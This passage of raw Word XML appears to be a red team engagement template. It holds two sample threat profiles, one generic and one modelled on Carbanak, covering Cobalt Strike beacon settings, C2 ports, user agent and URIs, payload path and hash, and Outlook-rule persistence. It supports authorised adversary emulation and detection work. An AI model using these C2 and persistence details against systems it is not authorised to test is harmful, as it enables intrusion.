          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>As part of the Red Team engagement, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> will be replicating the TTPs associated with the group known as [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>insert group</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]. Details have been provided in the form of threat profile. The profile a description of the threat being portrayed. Details include the threat's description and technical indicators that a threat leaves behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC11652" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Note: This is a simplified example intended to be used as reference. A full threat profile will likely be several pages in length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D822334" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D4C71" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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General mid-tiered threat that uses common offensive tools and techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBA80FD" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Goal and Intent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF34001" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEB34E4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Key IOCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58D018" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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lastRenderedPageBreak/>
        <w:t>Cobalt Strike HTTPS beacon on TCP 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633E437" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Payload: c:\programdata\microsoft\iexplore.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC6CDFF" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Timestamp: 7/13/2009 10:04 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D99C6E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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MD5: a7705501c5e216b56cf49dcf540184d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F531E45" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>C2 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD3600" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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HTTPS on port 443 Cobalt Strike Beacon with a five-minute callback time. Calling directly to threat-owned domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD7E6F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29783966" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Assumed Breach Model, no initial delivery via exploitation. POST-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation limited and determined </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>POST-exploitation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EC611" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77411CA4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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Assumed Breach Model, no exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4AEB3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DECAE4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User-level persistence using Microsoft Outlook rule triggered by specific email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFD0DD" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5842CC62" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>THREAT PROFILE (AUTOBANK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111DD348" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="403F1892" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 threat inspired by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APT malware. It uses DNS and HTTP for C2 communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E6158" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Reference: </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>http://krebsonsecurity.com/wp-content/uploads/2015/02/Carbanak_APT_eng.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A0951AD" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CHARACTERISTICS</w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:anchor="characteristics" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="228F121F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 Backend: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6F28C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port(s): 53, 445, 80 (DNS, SMB, HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3683C30C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C2 communication using DNS, HTTPS and SMB Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE6332" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP communication using DNS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hostnames</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29906C14" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Cobalt Strike HTTP Request Profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EF8EF" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0AF1C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET: /favicon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A872E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>POST /token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0F0E4" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYSTEM MODIFICATIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:anchor="system-modifications" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07461401" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>FILES</w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:anchor="files" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="267A0E2E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
